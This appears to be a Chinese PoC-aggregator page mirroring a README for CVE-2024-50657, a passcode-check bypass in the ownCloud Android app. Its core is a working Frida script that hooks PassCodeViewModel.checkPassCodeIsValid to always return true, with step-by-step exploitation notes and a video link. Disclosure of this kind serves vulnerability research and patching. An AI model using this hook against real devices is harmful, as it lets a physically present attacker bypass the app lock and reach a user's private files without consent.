POC详情: 56283ea45b5658cb654b69f0e1ca5ee32f444f30

来源
关联漏洞
标题: ownCloud 安全漏洞 (CVE-2024-50657)
描述:ownCloud是美国ownCloud公司的一套个人云存储解决方案。 ownCloud v.4.3.1版本存在安全漏洞。攻击者利用该漏洞可以提升权限。
介绍
# CVE-2024-50657:Incorrect Access Control on Owncloud apk
 An issue in Owncloud android apk allows a physically proximate attacker to escalate privileges via the PassCodeViewModel class, specifically in the checkPassCodeIsValid method.

# Exploitation
  
# Identify the Target Class and Method:

> The PassCodeViewModel class in the application manages the logic for passcode verification.
> The checkPassCodeIsValid method within this class is responsible for determining the validity of the entered passcode.

 # Hook the Method Using Frida:

> A Frida script is used to hook into the checkPassCodeIsValid method in the PassCodeViewModel class.
> The method's implementation is altered to always return true, bypassing the actual passcode validation.

# Execution:

> The Frida script is executed while the app is running.
> Any passcode input by the user will be accepted as valid, allowing unauthorized access.
# PoC

 Java.perform(function() {
 // Locate the PassCodeViewModel class in the target application
 var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

 // Hook the checkPassCodeIsValid method to modify its behavior
 PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {
 
  // Bypass the actual passcode check by always returning true
     return true;
   
 };

 });

Video POC Link : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing
# Impact:-
 This vulnerability is a client-side security bypass vulnerability. It affects users of the application who rely on the passcode feature to protect sensitive data or restrict access to certain app functionalities. By exploiting this vulnerability, an attacker can bypass the passcode check and gain unauthorized access to areas of the app that should be protected, potentially exposing user data or allowing unauthorized actions within the app.

文件快照

[4.0K] /data/pocs/56283ea45b5658cb654b69f0e1ca5ee32f444f30 └── [1.9K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。